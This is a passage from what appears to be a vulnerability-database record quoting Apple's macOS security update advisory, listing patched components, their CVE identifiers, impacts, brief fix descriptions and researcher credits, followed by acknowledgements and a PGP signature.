Images\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: An out-of-bounds read was addressed with improved input\nvalidation. \nCVE-2020-9965: Proteas\nCVE-2020-9966: Proteas\n\nFinder\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: Users may be unable to remove metadata indicating where files\nwere downloaded from\nDescription: The issue was addressed with additional user controls. \nCVE-2020-27894: Manuel Trezza of Shuggr (shuggr.com)\n\nFontParser\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: Processing a maliciously crafted image may lead to arbitrary\ncode execution\nDescription: A buffer overflow was addressed with improved size\nvalidation. \nCVE-2020-9962: Yi\u011fit Can YILMAZ (@yilmazcanyigit)\nEntry added December 14, 2020\n\nFontParser\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: Processing a maliciously crafted font file may lead to\narbitrary code execution\nDescription: An out-of-bounds write was addressed with improved input\nvalidation. \nCVE-2020-27952: an anonymous researcher, Mickey Jin and Junzhi Lu of\nTrend Micro\nEntry added December 14, 2020\n\nFontParser\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: Processing a maliciously crafted font file may lead to\narbitrary code execution\nDescription: An out-of-bounds read was addressed with improved input\nvalidation. \nCVE-2020-9956: Mickey Jin and Junzhi Lu of Trend Micro Mobile\nSecurity Research Team working with Trend Micro\u2019s Zero Day Initiative\nEntry added December 14, 2020\n\nFontParser\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: Processing a maliciously crafted font file may lead to\narbitrary code execution\nDescription: A memory corruption issue existed in the processing of\nfont files. This issue was addressed with improved input validation. \nCVE-2020-27931: Apple\nEntry added December 14, 2020\n\nFontParser\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: Processing a maliciously crafted font may lead to arbitrary\ncode execution. Apple is aware of reports that an exploit for this\nissue exists in the wild. \nDescription: A memory corruption issue was addressed with improved\ninput validation. \nCVE-2020-27930: Google Project Zero\n\nFontParser\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: Processing a maliciously crafted font file may lead to\narbitrary code execution\nDescription: An out-of-bounds write issue was addressed with improved\nbounds checking. \nCVE-2020-27927: Xingwei Lin of Ant Security Light-Year Lab\n\nFoundation\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: A local user may be able to read arbitrary files\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2020-10002: James Hutchins\n\nHomeKit\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: An attacker in a privileged network position may be able to\nunexpectedly alter application state\nDescription: This issue was addressed with improved setting\npropagation. \nCVE-2020-9978: Luyi Xing, Dongfang Zhao, and Xiaofeng Wang of Indiana\nUniversity Bloomington, Yan Jia of Xidian University and University\nof Chinese Academy of Sciences, and Bin Yuan of HuaZhong University\nof Science and Technology\nEntry added December 14, 2020\n\nImageIO\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: Processing a maliciously crafted image may lead to arbitrary\ncode execution\nDescription: An out-of-bounds write issue was addressed with improved\nbounds checking. \nCVE-2020-9955: Mickey Jin of Trend Micro, Xingwei Lin of Ant Security\nLight-Year Lab\nEntry added December 14, 2020\n\nImageIO\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: Processing a maliciously crafted image may lead to arbitrary\ncode execution\nDescription: An out-of-bounds read was addressed with improved input\nvalidation. \nCVE-2020-27924: Lei Sun\nEntry added December 14, 2020\n\nImageIO\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: Processing a maliciously crafted image may lead to arbitrary\ncode execution\nDescription: An out-of-bounds write was addressed with improved input\nvalidation. \nCVE-2020-27912: Xingwei Lin of Ant Security Light-Year Lab\nCVE-2020-27923: Lei Sun\nEntry updated December 14, 2020\n\nImageIO\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: Opening a maliciously crafted PDF file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: An out-of-bounds write issue was addressed with improved\nbounds checking. \nCVE-2020-9876: Mickey Jin of Trend Micro\n\nIntel Graphics Driver\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: An out-of-bounds write issue was addressed with improved\nbounds checking. \nCVE-2020-10015: ABC Research s.r.o. working with Trend Micro Zero Day\nInitiative\nCVE-2020-27897: Xiaolong Bai and Min (Spark) Zheng of Alibaba Inc.,\nand Luyi Xing of Indiana University Bloomington\nEntry added December 14, 2020\n\nIntel Graphics Driver\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed with improved\nmemory handling. \nCVE-2020-27907: ABC Research s.r.o. working with Trend Micro Zero Day\nInitiative\nEntry added December 14, 2020\n\nImage Processing\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: Processing a maliciously crafted image may lead to arbitrary\ncode execution\nDescription: An out-of-bounds write was addressed with improved input\nvalidation. \nCVE-2020-27919: Hou JingYi (@hjy79425575) of Qihoo 360 CERT, Xingwei\nLin of Ant Security Light-Year Lab\nEntry added December 14, 2020\n\nKernel\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: A remote attacker may be able to cause unexpected system\ntermination or corrupt kernel memory\nDescription: Multiple memory corruption issues were addressed with\nimproved input validation. \nCVE-2020-9967: Alex Plaskett (@alexjplaskett)\nEntry added December 14, 2020\n\nKernel\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A use after free issue was addressed with improved\nmemory management. \nCVE-2020-9975: Tielei Wang of Pangu Lab\nEntry added December 14, 2020\n\nKernel\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A race condition was addressed with improved state\nhandling. \nCVE-2020-27921: Linus Henze (pinauten.de)\nEntry added December 14, 2020\n\nKernel\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A logic issue existed resulting in memory corruption. \nThis was addressed with improved state management. \nCVE-2020-27904: Zuozhi Fan (@pattern_F_) of Ant Group Tianqong\nSecurity Lab\n\nKernel\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: An attacker in a privileged network position may be able to\ninject into active connections within a VPN tunnel\nDescription: A routing issue was addressed with improved\nrestrictions. \nCVE-2019-14899: William J. Tolley, Beau Kujath, and Jedidiah R. \nCrandall\n\nKernel\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: A malicious application may be able to disclose kernel\nmemory. Apple is aware of reports that an exploit for this issue\nexists in the wild. \nDescription: A memory initialization issue was addressed. \nCVE-2020-27950: Google Project Zero\n\nKernel\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: A malicious application may be able to determine kernel\nmemory layout\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2020-9974: Tommy Muir (@Muirey03)\n\nKernel\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed with improved\nstate management. \nCVE-2020-10016: Alex Helie\n\nKernel\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: A malicious application may be able to execute arbitrary code\nwith kernel privileges. Apple is aware of reports that an exploit for\nthis issue exists in the wild. \nDescription: A type confusion issue was addressed with improved state\nhandling. \nCVE-2020-27932: Google Project Zero\n\nlibxml2\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: Processing maliciously crafted web content may lead to code\nexecution\nDescription: A use after free issue was addressed with improved\nmemory management. \nCVE-2020-27917: found by OSS-Fuzz\nCVE-2020-27920: found by OSS-Fuzz\nEntry updated December 14, 2020\n\nlibxml2\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: A remote attacker may be able to cause unexpected application\ntermination or arbitrary code execution\nDescription: An integer overflow was addressed through improved input\nvalidation. \nCVE-2020-27911: found by OSS-Fuzz\n\nlibxpc\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: A malicious application may be able to elevate privileges\nDescription: A logic issue was addressed with improved validation. \nCVE-2020-9971: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab\nEntry added December 14, 2020\n\nlibxpc\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: A malicious application may be able to break out of its\nsandbox\nDescription: A parsing issue in the handling of directory paths was\naddressed with improved path validation. \nCVE-2020-10014: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab\n\nLogging\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: A local attacker may be able to elevate their privileges\nDescription: A path handling issue was addressed with improved\nvalidation. \nCVE-2020-10010: Tommy Muir (@Muirey03)\n\nMail\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: A remote attacker may be able to unexpectedly alter\napplication state\nDescription: This issue was addressed with improved checks. \nCVE-2020-9941: Fabian Ising of FH M\u00fcnster University of Applied\nSciences and Damian Poddebniak of FH M\u00fcnster University of Applied\nSciences\n\nMessages\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: A local user may be able to discover a user\u2019s deleted\nmessages\nDescription: The issue was addressed with improved deletion. \nCVE-2020-9988: William Breuer of the Netherlands\nCVE-2020-9989: von Brunn Media\n\nModel I/O\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: Processing a maliciously crafted USD file may lead to\nunexpected application termination or arbitrary code execution\nDescription: An out-of-bounds read was addressed with improved bounds\nchecking. \nCVE-2020-10011: Aleksandar Nikolic of Cisco Talos\nEntry added December 14, 2020\n\nModel I/O\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: Processing a maliciously crafted USD file may lead to\nunexpected application termination or arbitrary code execution\nDescription: An out-of-bounds read was addressed with improved input\nvalidation. \nCVE-2020-13524: Aleksandar Nikolic of Cisco Talos\n\nModel I/O\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: Opening a maliciously crafted file may lead to unexpected\napplication termination or arbitrary code execution\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2020-10004: Aleksandar Nikolic of Cisco Talos\n\nNetworkExtension\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: A malicious application may be able to elevate privileges\nDescription: A use after free issue was addressed with improved\nmemory management. \nCVE-2020-9996: Zhiwei Yuan of Trend Micro iCore Team, Junzhi Lu and\nMickey Jin of Trend Micro\n\nNSRemoteView\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: A sandboxed process may be able to circumvent sandbox\nrestrictions\nDescription: A logic issue was addressed with improved restrictions. \nCVE-2020-27901: Thijs Alkemade of Computest Research Division\nEntry added December 14, 2020\n\nNSRemoteView\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: A malicious application may be able to preview files it does\nnot have access to\nDescription: An issue existed in the handling of snapshots. The issue\nwas resolved with improved permissions logic. \nCVE-2020-27900: Thijs Alkemade of Computest Research Division\n\nPCRE\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: Multiple issues in pcre\nDescription: Multiple issues were addressed by updating to version\n8.44. \nCVE-2019-20838\nCVE-2020-14155\n\nPower Management\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: A malicious application may be able to determine kernel\nmemory layout\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2020-10007: singi@theori working with Trend Micro Zero Day\nInitiative\n\npython\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: Cookies belonging to one origin may be sent to another origin\nDescription: Multiple issues were addressed with improved logic. \nCVE-2020-27896: an anonymous researcher\n\nQuick Look\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: A malicious app may be able to determine the existence of\nfiles on the computer\nDescription: The issue was addressed with improved handling of icon\ncaches. \nCVE-2020-9963: Csaba Fitzl (@theevilbit) of Offensive Security\n\nQuick Look\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: Processing a maliciously crafted document may lead to a cross\nsite scripting attack\nDescription: An access issue was addressed with improved access\nrestrictions. \nCVE-2020-10012: Heige of KnownSec 404 Team\n(https://www.knownsec.com/) and Bo Qu of Palo Alto Networks\n(https://www.paloaltonetworks.com/)\n\nRuby\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: A remote attacker may be able to modify the file system\nDescription: A path handling issue was addressed with improved\nvalidation. \nCVE-2020-27896: an anonymous researcher\n\nRuby\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: When parsing certain JSON documents, the json gem can be\ncoerced into creating arbitrary objects in the target system\nDescription: This issue was addressed with improved checks. \nCVE-2020-10663: Jeremy Evans\n\nSafari\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: Visiting a malicious website may lead to address bar spoofing\nDescription: A spoofing issue existed in the handling of URLs. This\nissue was addressed with improved input validation. \nCVE-2020-9945: Narendra Bhati From Suma Soft Pvt. Ltd. Pune (India)\n@imnarendrabhati\n\nSafari\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: A malicious application may be able to determine a user\u0027s\nopen tabs in Safari\nDescription: A validation issue existed in the entitlement\nverification. This issue was addressed with improved validation of\nthe process entitlement. \nCVE-2020-9977: Josh Parnham (@joshparnham)\n\nSafari\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: Visiting a malicious website may lead to address bar spoofing\nDescription: An inconsistent user interface issue was addressed with\nimproved state management. \nCVE-2020-9942: an anonymous researcher, Rahul d Kankrale\n(servicenger.com), Rayyan Bijoora (@Bijoora) of The City School, PAF\nChapter, Ruilin Yang of Tencent Security Xuanwu Lab, YoKo Kho\n(@YoKoAcc) of PT Telekomunikasi Indonesia (Persero) Tbk, Zhiyang\nZeng(@Wester) of OPPO ZIWU Security Lab\n\nSandbox\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: A local user may be able to view senstive user information\nDescription: An access issue was addressed with additional sandbox\nrestrictions. \nCVE-2020-9969: Wojciech Regu\u0142a of SecuRing (wojciechregula.blog)\n\nSQLite\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: A remote attacker may be able to cause a denial of service\nDescription: This issue was addressed with improved checks. \nCVE-2020-9991\n\nSQLite\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: A remote attacker may be able to leak memory\nDescription: An information disclosure issue was addressed with\nimproved state management. \nCVE-2020-9849\n\nSQLite\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: Multiple issues in SQLite\nDescription: Multiple issues were addressed by updating SQLite to\nversion 3.32.3. \nCVE-2020-15358\n\nSQLite\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: A maliciously crafted SQL query may lead to data corruption\nDescription: This issue was addressed with improved checks. \nCVE-2020-13631\n\nSQLite\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: A remote attacker may be able to cause a denial of service\nDescription: This issue was addressed with improved checks. \nCVE-2020-13434\nCVE-2020-13435\nCVE-2020-9991\n\nSQLite\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: A remote attacker may be able to cause arbitrary code\nexecution\nDescription: A memory corruption issue was addressed with improved\nstate management. \nCVE-2020-13630\n\nSymptom Framework\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: A local attacker may be able to elevate their privileges\nDescription: A use after free issue was addressed with improved\nmemory management. \nCVE-2020-27899: 08Tc3wBB working with ZecOps\nEntry added December 14, 2020\n\nSystem Preferences\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: A sandboxed process may be able to circumvent sandbox\nrestrictions\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2020-10009: Thijs Alkemade of Computest Research Division\n\nTCC\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: A malicious application with root privileges may be able to\naccess private information\nDescription: A logic issue was addressed with improved restrictions. \nCVE-2020-10008: Wojciech Regu\u0142a of SecuRing (wojciechregula.blog)\nEntry added December 14, 2020\n\nWebKit\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: A use after free issue was addressed with improved\nmemory management. \nCVE-2020-27918: Liu Long of Ant Security Light-Year Lab\nEntry updated December 14, 2020\n\nWi-Fi\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: An attacker may be able to bypass Managed Frame Protection\nDescription: A denial of service issue was addressed with improved\nstate handling. \nCVE-2020-27898: Stephan Marais of University of Johannesburg\n\nXsan\nAvailable for: Mac Pro (2013 and later), MacBook Air (2013 and\nlater), MacBook Pro (Late 2013 and later), Mac mini (2014 and later),\niMac (2014 and later), MacBook (2015 and later), iMac Pro (all\nmodels)\nImpact: A malicious application may be able to access restricted\nfiles\nDescription: This issue was addressed with improved entitlements. \nCVE-2020-10006: Wojciech Regu\u0142a (@_r3ggi) of SecuRing\n\nAdditional recognition\n\n802.1X\nWe would like to acknowledge Kenana Dalle of Hamad bin Khalifa\nUniversity and Ryan Riley of Carnegie Mellon University in Qatar for\ntheir assistance. \nEntry added December 14, 2020\n\nAudio\nWe would like to acknowledge JunDong Xie and XingWei Lin of Ant-\nfinancial Light-Year Security Lab, an anonymous researcher for their\nassistance. \n\nBluetooth\nWe would like to acknowledge Andy Davis of NCC Group, Dennis Heinze\n(@ttdennis) of TU Darmstadt, Secure Mobile Networking Lab for their\nassistance. \nEntry updated December 14, 2020\n\nClang\nWe would like to acknowledge Brandon Azad of Google Project Zero for\ntheir assistance. \n\nCore Location\nWe would like to acknowledge Yi\u011fit Can YILMAZ (@yilmazcanyigit) for\ntheir assistance. \n\nCrash Reporter\nWe would like to acknowledge Artur Byszko of AFINE for their\nassistance. \nEntry added December 14, 2020\n\nDirectory Utility\nWe would like to acknowledge Wojciech Regu\u0142a (@_r3ggi) of SecuRing\nfor their assistance. \n\niAP\nWe would like to acknowledge Andy Davis of NCC Group for their\nassistance. \n\nKernel\nWe would like to acknowledge Brandon Azad of Google Project Zero,\nStephen R\u00f6ttger of Google for their assistance. \n\nlibxml2\nWe would like to acknowledge an anonymous researcher for their\nassistance. \nEntry added December 14, 2020\n\nLogin Window\nWe would like to acknowledge Rob Morton of Leidos for their\nassistance. \n\nPhotos Storage\nWe would like to acknowledge Paulos Yibelo of LimeHats for their\nassistance. \n\nQuick Look\nWe would like to acknowledge Csaba Fitzl (@theevilbit) and Wojciech\nRegu\u0142a of SecuRing (wojciechregula.blog) for their assistance. \n\nSafari\nWe would like to acknowledge Gabriel Corona and Narendra Bhati From\nSuma Soft Pvt. Ltd. Pune (India) @imnarendrabhati for their\nassistance. \n\nSecurity\nWe would like to acknowledge Christian Starkjohann of Objective\nDevelopment Software GmbH for their assistance. \n\nSystem Preferences\nWe would like to acknowledge Csaba Fitzl (@theevilbit) of Offensive\nSecurity for their assistance. \n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n-----BEGIN PGP SIGNATURE-----\n\niQIzBAEBCAAdFiEEbURczHs1TP07VIfuZcsbuWJ6jjAFAl/YDPwACgkQZcsbuWJ6\njjANmhAAoj+ZHNnH2pGDFl2/jrAtvWBtXg8mqw6NtNbGqWDZFhnY5q7Lp8WTx/Pi\nx64A4F8bU5xcybnmaDpK5PMwAAIiAg4g1BhpOq3pGyeHEasNx7D9damfqFGKiivS\np8nl62XE74ayfxdZGa+2tOVFTFwqixfr0aALVoQUhAWNeYuvVSgJXlgdGjj+QSL+\n9vW86kbQypOqT5TPDg6tpJy3g5s4hotkfzCfxA9mIKOg5e/nnoRNhw0c1dzfeTRO\nINzGxnajKGGYy2C3MH6t0cKG0B6cH7aePZCHYJ1jmuAVd0SD3PfmoT76DeRGC4Ri\nc8fGD+5pvSF6/+5E+MbH3t3D6bLiCGRFJtYNMpr46gUKKt27EonSiheYCP9xR6lU\nChpYdcgHMOHX4a07/Oo8vEwQrtJ4JryhI9tfBel1ewdSoxk2iCFKzLLYkDMihD6B\n1x/9MlaqEpLYBnuKkrRzFINW23TzFPTI/+i2SbUscRQtK0qE7Up5C+IUkRvBGhEs\nMuEmEnn5spnVG2EBcKeLtJxtf/h5WaRFrev72EvSVR+Ko8Cj0MgK6IATu6saq8bV\nkURL5empvpexFAvVQWRDaLgGBHKM+uArBz2OP6t7wFvD2p1Vq5M+dMrEPna1JO/S\nAXZYC9Y9bBRZfYQAv7nxa+uIXy2rGTuQKQY8ldu4eEHtJ0OhaB8=\n=T5Y8\n-----END PGP SIGNATURE-----\n\n\n. \nCVE-2020-9933: Min (Spark) Zheng and Xiaolong Bai of Alibaba Inc",
    "sources": [
      {
        "db": "NVD",
